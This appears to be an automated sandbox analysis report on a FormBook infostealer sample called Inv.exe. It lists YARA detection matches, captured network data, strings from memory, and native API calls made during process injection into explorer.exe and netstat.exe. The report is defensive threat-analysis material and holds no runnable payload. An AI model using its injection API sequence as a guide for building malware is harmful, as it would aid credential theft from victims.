72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52 Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><he
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Inv.exe, 00000000.00000002.673645409.0000000000A58000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041A08A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419FDA NtReadFile,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419FDC NtReadFile,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019898F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019895D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019897A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019899D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019898A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019895F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989560 NtWriteFile,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019896D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036A060 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036A08A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369FDC NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369FDA NtReadFile,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123D929
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012451BC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01247991
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012455E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01240432
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0124683C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012460C0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01245B50
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0040102F
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D1EF
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041E18E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041DAA3
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D6FE
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123D929
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123A951
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012451BC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01247991
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0124683C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012460C0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01245B50
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012455E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01240432
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194F900
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B090
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A120A8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01002
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197EBB0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0DBD2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A12B28
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A122AE
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972581
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195D5E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A12D07
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01940D20
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A11D55
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195841F
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A11FF1
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A12EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE22AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECFA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED03DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDDBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE2B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE28EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE20A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EEE824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE2EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E36E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDD616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE1FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EEDFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDD466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE25DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E42581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE1D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E10D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE2D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036E18E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D1EF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036DAAF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00352D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00352D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00359E3C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00359E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D6FE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00352FB0
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0123BFC3 appears 38 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01236EF1 appears 84 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01239160 appears 64 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01236F06 appears 36 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01237021 appears 40 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0194B150 appears 35 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0123715C appears 370 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02E1B150 appears 66 times
          Source: Inv.exe, 00000000.00000003.670693601.000000001A516000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.710037557.0000000001BCF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Inv.exe
          Source: Inv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
